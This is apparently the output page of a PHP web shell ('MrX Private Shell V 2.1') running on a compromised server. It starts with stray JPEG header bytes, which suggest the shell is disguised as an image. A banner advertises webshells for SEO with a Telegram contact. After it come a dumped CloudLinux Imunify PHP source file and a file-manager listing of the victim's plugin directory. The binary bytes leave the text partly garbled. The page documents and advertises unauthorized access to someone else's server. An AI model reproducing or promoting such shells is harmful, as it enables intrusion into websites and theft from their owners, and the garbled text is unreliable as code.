����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
<?php
/**
* Copyright (с) Cloud Linux GmbH & Cloud Linux Software, Inc 2010-2025 All Rights Reserved
*
* Licensed under CLOUD LINUX LICENSE AGREEMENT
* https://www.cloudlinux.com/legal/
*/
namespace CloudLinux\Imunify\App;
/**
* View interface.
*/
abstract class View {
/**
* Render a template.
*
* @param string $file Template file.
* @param array $data Template data.
*
* @return void
*/
public function render( $file, $data = array() ) {
$path = IMUNIFY_SECURITY_PATH . '/views/' . $file . '.php';
if ( is_readable( $path ) ) {
do_action( 'imunify_security_set_error_handler' );
try {
include $path;
} catch ( \Exception $e ) {
do_action(
'imunify_security_set_error',
E_ERROR,
'Widget rendering failed: ' . $e->getMessage(),
__FILE__,
__LINE__,
array(
'fingerprint' => array( 'widget_rendering_failed', get_class( $e ) ),
)
);
}
do_action( 'imunify_security_restore_error_handler' );
}
}
}
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| Api | Folder | 0755 |
|
|
| Defender | Folder | 0755 |
|
|
| Exception | Folder | 0755 |
|
|
| Helpers | Folder | 0755 |
|
|
| Model | Folder | 0755 |
|
|
| Views | Folder | 0755 |
|
|
| AccessManager.php | File | 1.99 KB | 0644 |
|
| AssetLoader.php | File | 1.7 KB | 0644 |
|
| DataStore.php | File | 12.55 KB | 0644 |
|
| Debug.php | File | 13.63 KB | 0644 |
|
| Environment.php | File | 1.67 KB | 0644 |
|
| Plugin.php | File | 4.7 KB | 0644 |
|
| PluginUpdateManager.php | File | 1.67 KB | 0644 |
|
| View.php | File | 999 B | 0644 |
|